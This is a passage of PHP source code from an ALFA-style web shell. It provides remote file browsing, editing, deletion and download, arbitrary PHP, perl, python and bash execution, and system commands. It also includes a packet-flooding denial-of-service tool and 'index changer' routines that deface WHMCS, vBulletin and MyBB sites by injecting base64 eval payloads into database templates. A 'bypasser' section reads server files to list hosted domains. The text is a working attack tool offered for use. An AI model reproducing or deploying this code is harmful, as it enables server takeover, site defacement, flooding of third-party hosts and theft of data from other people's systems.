'.$icon.''.(($f['type']=='file')?(isset($f['link'])?'[L] ':'').alfaSize($f['size']):$f['type']).''.$f['modify'].''.$f['owner'].'/'.$f['group'].''.

$f['perms'].'		R T'.(($f['type']=='file')?' E D':'').' X 












".$page_builder."
";

alfafooter();

}

function get_pagination_links($current_page, $total_pages){

    $links = "";

    if ($total_pages >= 1 && $current_page <= $total_pages) {

        $links .= "<<";

        $selected_page = "";

        if($current_page == 1){

            $selected_page = " active-page-number";

        }

        $links .= "1";

        $i = max(2, $current_page - 5);

        if ($i > 2)

            $links .= "...";

        for (; $i < min($current_page + 6, $total_pages); $i++) {

            if($i == $current_page){

                $selected_page = " active-page-number";

            }else{

                $selected_page = "";

            }

            $links .= "{$i}";

        }

        if ($i != $total_pages)

            $links .= "...";

        $selected_page = " last-page-number";

        if($current_page == $total_pages){

            $selected_page .= " active-page-number";

        }

        $links .= "{$total_pages}";

        $links .= ">>";

    }

    return $links;

}

function alfaFilesTools(){

alfahead();

echo '
';

if(isset($_POST['alfa1']))$_POST['alfa1'] = rawurldecode($_POST['alfa1']);

$alfa1_decoded = $_POST['alfa1'];

$chdir_fals = false;

if(!@chdir($_POST['c'])){

    $chdir_fals = true;

    $_POST['alfa1'] = $_POST["c"]."/".$_POST["alfa1"];

    $alfa_canruncmd = _alfa_can_runCommand(true,true);

    if($alfa_canruncmd){

        $slashed_alfa1 = addslashes($_POST['alfa1']);

        $file_info = explode(":", alfaEx('stat -c "%F:%U:%G:%s:%Y:0%a:%A" "'.$slashed_alfa1.'"'));

        $perm_color_class = alfaEx("if [[ -w '".$slashed_alfa1."' ]]; then echo main_green_perm; elif [[ -r '".$slashed_alfa1."' ]]; then echo main_white_perm; else echo main_red_perm; fi");

    }

}

if($_POST['alfa2'] == 'auto'){

if(is_array(@getimagesize($_POST['alfa1']))){

$_POST['alfa2'] = 'image';

}else{

    $_POST['alfa2'] = 'view';

    if($chdir_fals){

        if($alfa_canruncmd){

            $mime = explode(":", alfaEx("file --mime-type '".addslashes($_POST['alfa1'])."'"));

            $mimetype = $mime[1];

            if(!empty($mimetype)){

                if(strstr($mimetype, "image")){

                    $_POST['alfa2'] = 'image';

                }

            }

        }

    }

}

}

if($_POST['alfa2'] == "rename" && !empty($_POST['alfa3']) && @is_writable($_POST['alfa1'])){$rename_cache = $_POST['alfa3'];}

if(@$_POST['alfa2'] == 'mkfile'){

$_POST['alfa1'] = trim($_POST['alfa1']);

if($chdir_fals&&$alfa_canruncmd){

    if(_alfa_is_writable($_POST["c"])){

        alfaEx("cd '".addslashes($_POST["c"])."';touch '".addslashes($alfa1_decoded)."'");

        $_POST['alfa2'] = "edit";

    }

}

if(!@file_exists($_POST['alfa1'])){

$fp = @fopen($_POST['alfa1'], 'w');

if($fp){

$_POST['alfa2'] = "edit";

fclose($fp);

}

}else{

$_POST['alfa2'] = "edit";

}

}

if(!_alfa_file_exists(@$_POST['alfa1'])){

echo __pre()."

!...FILE DOEST NOT EXITS...!

";

alfaFooter();

return;

}

if($chdir_fals){

$filesize = $file_info[3];

$uid["name"] = $file_info[1];

$gid["name"] = $file_info[2];

$permcolor = alfaPermsColor(array("class"=>$perm_color_class,"num"=>$file_info[5],"human"=>$file_info[6]),true);

}else{

$uid = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($_POST['alfa1'])):'';

$gid = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($_POST['alfa1'])):'';

if(!$uid&&!$gid){

$uid['name'] = function_exists("fileowner")?@fileowner($_POST['alfa1']):'';

$gid['name'] = function_exists("filegroup")?@filegroup($_POST['alfa1']):'';

}

$permcolor = alfaPermsColor($_POST['alfa1']);

$filesize = @filesize($_POST['alfa1']);

if(!isset($uid['name'],$gid['name'])||empty($uid['name'])||empty($gid['name'])){

    if(_alfa_can_runCommand()){

        list($uid['name'],$gid['name']) = explode(":", alfaEx('stat -c "%U:%G" "'.addslashes($_POST["c"]."/".$_POST["alfa1"]).'"'));

    }

}

}

if(substr($_POST['alfa1'], 0, 7) == "phar://"){

    $alfa_file_directory = $_POST['alfa1'];

}else{

    $alfa_file_directory = str_replace("//", "/",($chdir_fals?"":$_POST['c'].'/').$_POST['alfa1']);

}

echo '
Name: '.htmlspecialchars(basename($alfa1_decoded)).' Size: '.alfaSize($filesize).' Permission: '.$permcolor.' Owner/Group: '.$uid['name'].'/'.$gid['name'].' Directory: '.dirname($alfa_file_directory).'
';

if(empty($_POST['alfa2']))$_POST['alfa2'] = 'view';

if(!_alfa_is_dir($_POST['alfa1'])){

$m = array('View', 'Download', 'Highlight', 'Chmod', 'Rename', 'Touch', 'Delete', 'Image', 'Hexdump');

$ftype = "file";

}else{

$m = array('Chmod', 'Rename', 'Touch');

$ftype = "dir";

}

echo('';

switch($_POST['alfa2']){

case 'view':case 'edit':

@chdir($_POST['c']);

$disabled_btn = "";

if(!@is_writable($_POST['alfa1'])&&!_alfa_is_writable($_POST['alfa1'])){

$disabled_btn = "disabled=disabled";

$disabled_btn_style= 'background: #ff0000;color: #fff;';

}

if(!empty($_POST['alfa3'])){

$_POST['alfa3'] = substr($_POST['alfa3'],1);

$time = @filemtime($_POST['alfa1']);

$fp = @__write_file($_POST['alfa1'],$_POST['alfa3']);

if($chdir_fals&&$alfa_canruncmd){

    $rname = $alfa1_decoded;

    $randname = $rname.rand(111,9999);

    $filepath = dirname($_SERVER["SCRIPT_FILENAME"])."/".$randname;

    if($fp = @__write_file($filepath ,$_POST['alfa3'])){

        alfaEx("mv '".addslashes($filepath)."' '".addslashes($_POST["alfa1"])."';rm -f '".addslashes($filepath)."'");

    }

}

if($fp){

echo 'Saved!
';

@touch($_POST['alfa1'],$time,$time);

}

}

echo '
'._alfa_load_ace_options("editor").'  
';

echo htmlspecialchars(__read_file($_POST['alfa1']));

echo '
';







break;







case 'highlight':







@chdir($_POST['c']);







if(@is_readable($_POST['alfa1'])){







echo '




	

	

		

		
';
			

			

			

			
$code = @highlight_file($_POST['alfa1'],true);
			

			

			

			
echo str_replace(array(''), array(''),$code).'
';







}







break;







case 'delete':







@chdir($_POST['c']);







if(@is_writable($_POST['alfa1'])||$GLOBALS["glob_chdir_false"]){







$deleted = true;







if(!@unlink($_POST['alfa1'])){







 $deleted = false;







 if($alfa_canruncmd){







 if(_alfa_is_writable($_POST['alfa1'])){







 alfaEx("rm -f '".addslashes($_POST['alfa1'])."'");







 $deleted = true;







 }







 }







}







if($deleted)echo 'File Deleted...';else echo 'Error...';}







break;







case 'chmod':







@chdir($_POST['c']);







if(!empty($_POST['alfa3'])){







$perms = 0;







for($i=strlen($_POST['alfa3'])-1;$i>=0;--$i)







$perms += (int)$_POST['alfa3'][$i]*pow(8, (strlen($_POST['alfa3'])-$i-1));







if(!@chmod($_POST['alfa1'], $perms)){







if($chdir_fals&&$alfa_canruncmd){







alfaEx("cd '".addslashes($_POST["c"])."';chmod ".addslashes($_POST['alfa3'])." '".addslashes($alfa1_decoded)."'");







echo('Success!');







}else{







echo 'Can\'t set permissions!



';}







}else{echo('Success!');}







}







clearstatcache();







AlfaNum(8,9,10,7,6,5,4,2,1);







if($chdir_fals){







 $file_perm = $file_info[5];







}else{







 $file_perm = substr(sprintf('%o', @fileperms($_POST['alfa1'])),-4);







}







echo '




	

	
	

	
	


';







break;







case 'hexdump':







@chdir($_POST['c']);







$c = __read_file($_POST['alfa1']);







$n = 0;







$h = array('00000000



','','');







$len = strlen($c);







for ($i=0; $i<$len; ++$i) {







$h[1] .= sprintf('%02X',ord($c[$i])).' ';







switch ( ord($c[$i]) ) {







case 0: $h[2] .= ' '; break;







case 9: $h[2] .= ' '; break;







case 10: $h[2] .= ' '; break;







case 13: $h[2] .= ' '; break;







default: $h[2] .= $c[$i]; break;







}







$n++;







if ($n == 32) {







$n = 0;







if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'



';}







$h[1] .= '



';







$h[2] .= "\n";







}







}







echo '




	

	

		

		

		

		


		

			
				

					
'.$h[0].'

					
'.$h[1].'

					
'.htmlspecialchars($h[2]).'

				

			
		

		
 
';







break;







case 'rename':







@chdir($_POST['c']);







$alfa1_escape = addslashes($_POST["alfa1"]);







$alfa3_escape = addslashes($_POST["alfa3"]);







if(!empty($_POST['alfa3'])){







$cmd_rename = false;







if($chdir_fals&&$alfa_canruncmd){







if(_alfa_is_writable($_POST['alfa1'])){







$alfa1_escape = addslashes($alfa1_decoded);







alfaEx("cd '".addslashes($_POST['c'])."';mv '".$alfa1_escape."' '".addslashes($_POST['alfa3'])."'");







}else{







$cmd_rename = true;







}







}else{







$alfa1_escape = addslashes($_POST["alfa1"]);







}







if(!@rename($_POST['alfa1'], $_POST['alfa3'])&&$cmd_rename){







echo 'Can\'t rename!



';}else{echo('Renamed!');$alfa1_escape = $alfa3_escape;}







}







echo '




	

	
	

	
	


';







break;







case 'touch':







@chdir($_POST['c']);







if( !empty($_POST['alfa3']) ) {







$time = strtotime($_POST['alfa3']);







if($time){







$touched = false;







if($chdir_fals&&$alfa_canruncmd){







 alfaEx("cd '".addslashes($_POST["c"])."';touch -d '".htmlspecialchars(addslashes($_POST['alfa3']))."' '".addslashes($alfa1_decoded)."'");







 $touched = true;







}







if(!@touch($_POST['alfa1'],$time,$time)&&!$touched)







echo 'Fail!';







else







echo 'Touched!';







} else echo 'Bad time format!';







}







clearstatcache();







echo '




	

	
	

	
	


';







break;







case 'image':







@chdir($_POST['c']);







echo('



');







$file = $_POST['alfa1'];







$image_info = @getimagesize($file);







if(is_array($image_info)||$chdir_fals){







$width = (int)$image_info[0];







$height = (int)$image_info[1];







if($chdir_fals&&$alfa_canruncmd){







 $source = alfaEx("cat '".addslashes($file)."' | base64");







 list($width, $height) = explode(":", alfaEx("identify -format '%w:%h' '".addslashes($file)."'"));







 $mime = explode(":", alfaEx("file --mime-type '".addslashes($file)."'"));







 $image_info['mime'] = $mime[1];







}else{







 $source = __ZW5jb2Rlcg(__read_file($file, false));







}







$image_info_h = "Image type = [ ".$image_info['mime']." ]



Image Size = [ ".$width." x ".$height." ]



";







if($width > 800){$width = 800;}







echo $content = "




	

	
".$image_info_h."
		

		
".$file."




";







}







break;







}







echo '';







alfaFooter();







}







function findicon($file,$type){







$s = 'http://solevisible.com/icons/';







$types = array('json','ppt','pptx','xls','xlsx','msi','config','cgi','pm','c','cpp','cs','java','aspx','asp','db','ttf','eot','woff','woff2','woff','conf','log','apk','cab','bz2','tgz','dmg','izo','jar','7z','iso','rar','bat','sh','alfa','gz','tar','php','php4','php5','phtml','html','xhtml','shtml','htm','zip','png','jpg','jpeg','gif','bmp','ico','txt','js','rb','py','xml','css','sql','htaccess','pl','ini','dll','exe','mp3','mp4','m4a','mov','flv','swf','mkv','avi','wmv','mpg','mpeg','dat','pdf','3gp','doc','docx','docm');







if($type!='file'){







return ($file=='..'?$s.'back.png':$s.'folder.png');







}else{







$ext = explode('.',$file);







$ext = end($ext);







$ext = strtolower($ext);







return (in_array($ext,$types)?$s.$ext.'.png':$s.'notfound.png');







}







}







function alfadlfile(){







if(isset($_POST['c'],$_POST['file'])){







$basename = rawurldecode(basename($_POST['file']));







$_POST['file'] = str_replace("//", "/", $_POST['c'].'/'.$basename);







$alfa_canruncmd = _alfa_can_runCommand(true,true);







if(@is_file($_POST['file']) && @is_readable($_POST['file']) || $alfa_canruncmd){







ob_start("ob_gzhandler", 4096);







header("Content-Disposition: attachment; filename=\"".addslashes($basename)."\"");







header("Content-Type: application/octet-stream");







if($GLOBALS["glob_chdir_false"]){







 $randname = $basename.rand(111,9999);







 $scriptpath = dirname($_SERVER["SCRIPT_FILENAME"]);







 $filepath = $scriptpath."/".$randname;







 if(_alfa_is_writable($scriptpath)){







 alfaEx("cp '".addslashes($_POST["file"])."' '".addslashes($filepath)."'");







 readfile($filepath);







 @unlink($filepath);







 }else{







 alfaEx("cat '".addslashes($_POST["file"])."'");







 }







}else{







 readfile($_POST['file']);







}







}else echo('Error...!');}}







function __alfa_set_cookie($key, $value){







 $_COOKIE[$key] = $value;







 @setcookie($key, $value, time()+(86400 * 7), '/');







}







function alfaphpeval(){







if(isset($_COOKIE["eval_tmpdir"])&&@is_dir($_COOKIE["eval_tmpdir"])){







 $tempdir = __ZGVjb2Rlcg($_COOKIE["eval_tmpdir"]);







}else{







 $tempdir = dirname(alfaEx("mktemp"));







 __alfa_set_cookie("eval_tmpdir", __ZW5jb2Rlcg($tempdir));







}







alfahead();







if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'ini')){







echo '



';
	

	

	

	
ob_start();
	

	

	

	
$INI=ini_get_all();
	

	

	

	
print ''
	

	

	

	
.''
	

	

	

	
.''
	

	

	

	
.''
	

	

	

	
.'';
	

	

	

	
foreach ($INI as $param => $values)
	

	

	

	
print "\n".''
	

	

	

	
.''
	

	

	

	
.''
	

	

	

	
.''
	

	

	

	
.'';
	

	

	

	
$tmp = ob_get_clean();
	

	

	

	
$tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
	

	

	

	
$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
	

	

	

	
echo str_replace('
	

	
';
	

	

	

	
}
	

	

	

	
if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'info')) {
	

	

	

	
echo '
	

	
';
		

		

		

		
ob_start();
		

		

		

		
phpinfo();
		

		

		

		
$tmp = ob_get_clean();
		

		

		

		
$tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
		

		

		

		
$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
		

		

		

		
echo str_replace('
		

		
';
		

		

		

		
}
		

		

		

		
if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'exten')) {
		

		

		

		
echo '
		

		
';
			

			

			

			
ob_start();
			

			

			

			
$EXT=get_loaded_extensions();
			

			

			

			
echo '

	

	

	

	

	

	

	

	

	


	

		
			

				Param
				Global value
				Local Value
				Access
			

			

				'.$param.'
				'.$values['global_value'].' 
				'.$values['local_value'].' 
				'.$values['access'].' 
			

		
	
'."\n".'
	

	

	


	

		
			

				'.implode('
			

			

				', $EXT).'
			

		
	
'.count($EXT).' extensions loaded';
	

	

	

	
echo '




';







}







$lang_html = "";







foreach(array("php"=>"php ~> [ Windows / Linux ]","perl"=>"perl ~> [ Linux ]","python"=>"python ~> [ Linux ]","bash"=>"bash ~> [ Linux ]") as $key=>$val){$lang_html .= '


';}







echo '



| INI_INFO |  | phpinfo | | extensions |
	

	

	

	

		

		
Select Language: 

		

		'._alfa_load_ace_options("eval").'
		

		

		

		

		

		

			

			
'.(!empty($_POST['alfa1'])?htmlspecialchars($_POST['alfa1']):"<?php\n\n\techo('hello alfa !');\n\n?>").'

		

		';
		

		

		

		
echo '
';

if(!empty($_POST['alfa1'])){

if($_POST['alfa3']=="php"){

ob_start();

eval('?>'.$_POST['alfa1']);

$result = htmlspecialchars(ob_get_clean());

}elseif(_alfa_can_runCommand()&&$GLOBALS["sys"]=="unix"){

    $lang = $_POST['alfa3'];

    $filename = "temp".rand(11111,99999);

    $temp = $tempdir."/".$filename ;

    __write_file($filename, $_POST['alfa1']);

    $result = alfaEx("mv {$filename} {$temp};{$lang} {$temp};rm -f {$temp}");

    @unlink($filename);

    @unlink($temp);

}

echo '';

}

echo '
';







alfafooter();







}







function alfahash(){







if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}







if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i '__ZW5jb2Rlcg($s)',







'Base64_decode ( $string )' => '__ZGVjb2Rlcg($s)',







'strrev ( $string )' => 'strrev($s)',







'bin2hex ( $string )' => 'bin2hex($s)',







'hex2bin ( $string )' => 'hex2bin($s)',







'md5 ( $string )' => 'md5($s)',







'sha1 ( $string )' => 'sha1($s)',







'hash ( "sha251", $string ) --> sha251' => 'hash("sha256",$s)',







'hash ( "sha384", $string ) --> sha384' => 'hash("sha384",$s)',







'hash ( "sha512", $string ) --> sha512' => 'hash("sha512",$s)',







'crypt ( $string )' => 'crypt($s)',







'crc32 ( $string )' => 'crc32($s)',







'str_rot13 ( $string )' => 'str_rot13($s)',







'urlencode ( $string )' => 'urlencode($s)',







'urldecode ( $string )' => 'urldecode($s)',







'full_urlencode ( $string )' => 'full_urlencode($s)',







'htmlspecialchars ( $string )' => 'htmlspecialchars($s)',







'base64_encode (gzdeflate( $string , 9)) --> Encode' => '__ZW5jb2Rlcg(gzdeflate($s, 9))',







'gzinflate (base64_decode( $string )) --> Decode' => '@gzinflate(__ZGVjb2Rlcg($s))',







'str_rot13 (base64_encode( $string )) --> Encode' => 'str_rot13(__ZW5jb2Rlcg($s))',







'base64_decode (str_rot13( $string )) --> Decode' => '__ZGVjb2Rlcg(str_rot13($s))',







'str_rot13 (base64_encode(gzdeflate( $string , 9))) --> Encode' => 'str_rot13(__ZW5jb2Rlcg(gzdeflate($s,9)))',







'gzinflate (base64_decode(str_rot13( $string ))) --> Decode' => '@gzinflate(__ZGVjb2Rlcg(str_rot13($s)))',







);







alfahead();







echo '



';
	

	

	

	
echo "
	

	

		

		
Method:

		

		
		

		
		

		

		

		
		
 
";
	

	

	

	
if(!empty($_POST['alfa1'])){
	

	

	

	
$string = addslashes($_POST['alfa2']);
	

	

	

	
$string = str_replace('\"','"',$string);
	

	

	

	
$alg = $_POST['alfa1'];
	

	

	

	
$code = str_replace('$s',"'".$string."'",$alg);
	

	

	

	
ob_start();
	

	

	

	
eval('echo '.$code.';');
	

	

	

	
$res = ob_get_contents();
	

	

	

	
ob_end_clean();
	

	

	

	
if(in_array($alg, $stringTools))echo '
	

	';
	

	

	

	
}
	

	

	

	
echo "
";







alfaFooter();







}







function alfados(){







alfahead();







echo '



';
	

	

	

	
echo '
	

	


	

		

		

		
 

	

	
| DOS |

	

	


	

		

		

		
 

	

	

		

		
Method :
			

			 Host :
			

			 Time :
			

			 Port :
			

			
			

			
			
 

		
 

	

	
';
	

	

	

	
if(!empty($_POST['alfa1']) && !empty($_POST['alfa2']) && !empty($_POST['alfa3'])){
	

	

	

	
echo __pre();
	

	

	

	
$packets=0;
	

	

	

	
ignore_user_abort(true);
	

	

	

	
$exec_time=(int)$_POST['alfa2'];
	

	

	

	
$time=time();
	

	

	

	
$max_time=$exec_time+$time;
	

	

	

	
$host=$_POST['alfa1'];
	

	

	

	
$port=(int)$_POST['alfa3'];
	

	

	

	
$method=$_POST['alfa4'];
	

	

	

	
$out = str_repeat('X',65000);
	

	

	

	
while(1){
	

	

	

	
$packets++;
	

	

	

	
if(time() > $max_time){
	

	

	

	
break;
	

	

	

	
}
	

	

	

	
$fp = @fsockopen($method.'://'.$host, $port, $errno, $errstr, 5);
	

	

	

	
if($fp){
	

	

	

	
fwrite($fp, $out);
	

	

	

	
fclose($fp);
	

	

	

	
}
	

	

	

	
}
	

	

	

	
echo "$packets (" . @round(($packets*65)/1024, 2) . " MB) packets averaging ". @round($packets/$exec_time, 2) . " packets per second";
	

	

	

	
echo "




";







}







echo '';







alfafooter();







}







function __pre(){return('
');}

function alfaIndexChanger(){

alfahead();



echo '

| Index Changer |

| Whmcs | | vBulletin | | MyBB | 
';

if(isset($_POST['alfa3'])&&($_POST['alfa3'] == 'whmcs')){

echo __pre();



echo "
| Whmcs |



".getConfigHtml('whmcs')."


";

$table = array('td1' =>

 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),

 'td2' =>

 array('color' => 'FFFFFF', 'tdName' => 'URL', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'),

 'td3' =>

 array('color' => 'FFFFFF', 'tdName' => 'File Name', 'inputName' => 'fname', 'inputValue' => '', 'inputSize' => '50'),

 'td4' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),

 'td5' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),

 'td6' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')

);

create_table($table);

echo "
| Your Index |








";

if(isset($_POST['alfa6'])){

$s0levisible="Powered By Solevisible";

$dbu = $_POST['alfa6'];

$path = $_POST['alfa5'];

$fname = $_POST['alfa4'];

$dbn = $_POST['alfa7'];

$dbp = $_POST['alfa8'];

$dbh = $_POST['alfa9'];

$index = $_POST['alfa10'];

$index = str_replace("\'","'",$index);

$deface = '$x = base64_decode("'.__ZW5jb2Rlcg($index).'"); $solevisible = fopen("'.$fname.'","w"); fwrite($solevisible,$x);';

$saveData = __ZW5jb2Rlcg($deface);

$Def = '{php}eval(base64_decode("'.$saveData.'"));{/php}';

if(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){

$conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));

$soleSave=@mysqli_query($conn,"select message from tblemailtemplates where name='Password Reset Validation'");

$soleGet = mysqli_fetch_assoc($soleSave);

$tempSave1 = $soleGet['message'];

$tempSave = str_replace("'","\'",$tempSave1);

$inject = "UPDATE tblemailtemplates SET message='$Def' WHERE name='Password Reset Validation'";

$result=@mysqli_query($conn,$inject) or die (mysqli_error($conn));

$create = "insert into tblclients (email) values('solevisible@fbi.gov')";

$result2 =@mysqli_query($conn,$create) or die (mysqli_error($conn));

if(function_exists('curl_version')){

$AlfaSole = new AlfaCURL(true);

$saveurl = $AlfaSole->Send($path."/pwreset.php");

$getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i",$saveurl,$token);

$AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov");

$backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";

$Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));

__alert('File Created...');

echo "
Click Here !

";

}else{

echo "
Please go to Target \" ".$path."/pwreset.php \"
 and reset password with email => solevisible@fbi.gov
and go to \" ".$path."/".$fname." \"

";

}}}}

if(isset($_POST['alfa1']) && ($_POST['alfa1'] == 'vb')){

echo __pre();



echo "
| vBulletin |



".getConfigHtml('vb')."
>'); return false;\">

";

$table = array('td1' =>

 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),

 'td2' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),

 'td3' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),

 'td4' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),

 'td5' =>

 array('color' => 'FFFFFF', 'tdName' => 'Prefix', 'inputName' => 'prefix', 'id' => 'db_prefix', 'inputValue' => '', 'inputSize' => '50')

);

create_table($table);

echo "
| Your Index |






";

if($_POST['alfa8']=='>>'){

$s0levisible="Powered By Solevisible";

$dbu = $_POST['alfa2'];

$dbn = $_POST['alfa3'];

$dbp = $_POST['alfa4'];

$dbh = $_POST['alfa5'];

$index = $_POST['alfa6'];

$prefix = $_POST['alfa7'];

$index=str_replace("\'","'",$index);

$set_index = "{\${eval(base64_decode(\'";

$set_index .= __ZW5jb2Rlcg("echo \"$index\";");

$set_index .= "\'))}}{\${exit()}}";

if(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){

$conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));

$loli1 = "UPDATE ".$prefix."template SET template='".$set_index."".$s0levisible."' WHERE title='spacer_open'";

$loli2 = "UPDATE ".$prefix."template SET template='".$set_index."".$s0levisible."' WHERE title='FORUMHOME'";

$loli3 = "UPDATE ".$prefix."style SET css='".$set_index."".$s0levisible."', stylevars='', csscolors='', editorstyles=''";

@mysqli_query($conn,$loli1) or die (mysqli_error($conn));

@mysqli_query($conn,$loli2) or die (mysqli_error($conn));

@mysqli_query($conn,$loli3) or die (mysqli_error($conn));

__alert('VB index changed...!');

}

}

}

if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'mybb')) {

echo __pre();



echo "
| Mybb |



".getConfigHtml('mybb')."


";

$table = array('td1' =>

 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'mybbdbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),

 'td2' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'mybbdbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),

 'td3' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'mybbdbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),

 'td4' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'mybbdbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')

);

create_table($table);

echo "
| Your Index |



";

if(isset($_POST['alfa6'])){

$mybb_dbh = $_POST['alfa6'];

$mybb_dbu = $_POST['alfa7'];

$mybb_dbn = $_POST['alfa8'];

$mybb_dbp = $_POST['alfa9'];

$mybb_index = $_POST['alfa10'];

if(!empty($mybb_dbh)&&!empty($mybb_dbu)&&!empty($mybb_dbn)&&!empty($mybb_index)){

$conn=@mysqli_connect($mybb_dbh,$mybb_dbu,$mybb_dbp,$mybb_dbn) or die(mysqli_error($conn));

$prefix="mybb_";

$loli7 = "UPDATE ".$prefix."templates SET template='".$mybb_index."' WHERE title='index'";

$result =@mysqli_query($conn,$loli7) or die (mysqli_error($conn));

__alert('MyBB index changed...!');

}

}

}

echo "
";







alfafooter();







}







function alfaproc()







{







alfahead();







echo "




	

	
";
	

	

	

	
if(empty($_POST['ajax'])&&!empty($_POST['alfa1']))
	

	

	

	
$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
	

	

	

	
if($GLOBALS['sys']=="win"){
	

	

	

	
$process=array(
	

	

	

	
"Task List" =>"tasklist /V",
	

	

	

	
"System Info" =>"systeminfo",
	

	

	

	
"Active Connections" => "netstat -an",
	

	

	

	
"Running Services" => "net start",
	

	

	

	
"User Accounts" => "net user",
	

	

	

	
"Show Computers" => "net view",
	

	

	

	
"ARP Table" => "arp -a",
	

	

	

	
"IP Configuration" => "ipconfig /all"
	

	

	

	
);}else{
	

	

	

	
$process=array(
	

	

	

	
"Process status" => "ps aux",
	

	

	

	
"Syslog" =>"cat /etc/syslog.conf",
	

	

	

	
"Resolv" => "cat /etc/resolv.conf",
	

	

	

	
"Hosts" =>"cat /etc/hosts",
	

	

	

	
"Cpuinfo"=>"cat /proc/cpuinfo",
	

	

	

	
"Version"=>"cat /proc/version",
	

	

	

	
"Sbin"=>"ls -al /usr/sbin",
	

	

	

	
"Interrupts"=>"cat /proc/interrupts",
	

	

	

	
"lsattr"=>"lsattr -va",
	

	

	

	
"Uptime"=>"uptime",
	

	

	

	
"Fstab" =>"cat /etc/fstab"
	

	

	

	
);}
	

	

	

	
foreach($process as $n => $link){
	

	

	

	
echo ' | '.$n.' | ';
	

	

	

	
}
	

	

	

	
echo "
	

	
";
	

	

	

	
if(!empty($_POST['alfa1'])){
	

	

	

	
echo "
";

if($GLOBALS["glob_chdir_false"]&&!empty($_POST["c"])){$cmd = "cd '".addslashes($_POST["c"])."';";}

echo alfaEx($cmd.$_POST['alfa1'], true);

echo '
';
	

	

	

	
}
	

	

	

	
echo "
";







alfafooter();







}







function alfasafe(){







alfahead();







echo "




	

	

	

	
| Auto ByPasser |
";
	

	

	

	
echo '
	

	


	
| PHP.INI | | .htaccess(apache) | | .htaccess(LiteSpeed) || Read-Passwd | | Read-Users | | Get-User | | Get-Domains | 
';
	

	

	

	
if(!empty($_POST['alfa8']) && isset($_POST['alfa8']) == 'domains'){
	

	

	

	
if(!_alfa_file_exists("/etc/virtual/domainowners")){
	

	

	

	
echo __pre();
	

	

	

	
$solevisible9 = _alfa_file('/etc/named.conf');
	

	

	

	
if(is_array($solevisible9)){
	

	

	

	
foreach($solevisible9 as $solevisible13){
	

	

	

	
if(@eregi('zone',$solevisible13)){
	

	

	

	
preg_match_all('#zone "(.*)"#',$solevisible13,$solevisible14);
	

	

	

	
if(strlen(trim($solevisible14[1][0])) > 2){
	

	

	

	
echo $solevisible14[1][0].'
	

	
';
	

	

	

	
}}}
	

	

	

	
}
	

	

	

	
}else{
	

	

	

	
echo __pre();
	

	

	

	
$users = _alfa_file("/etc/virtual/domainowners");
	

	

	

	
if(is_array($users)){
	

	

	

	
foreach($users as $boz){
	

	

	

	
$dom = explode(":",$boz);
	

	

	

	
echo $dom[0]."\n";}}}}
	

	

	

	
if(!empty($_POST['alfa6']) && isset($_POST['alfa6']) == 'valiases'){
	

	

	

	
echo '
	

	

	

	

	

	

		

		
Url:
			

			
			

			
			
 

		
 
';
	

	

	

	
if(isset($_POST['alfa9']) && $_POST['alfa9'] == '>>'){
	

	

	

	
if(!_alfa_file_exists("/etc/virtual/domainowners")){
	

	

	

	
$site = trim($_POST['alfa7']);
	

	

	

	
$rep = str_replace(array("https://","http://","www."),"",$site);
	

	

	

	
$user = "";
	

	

	

	
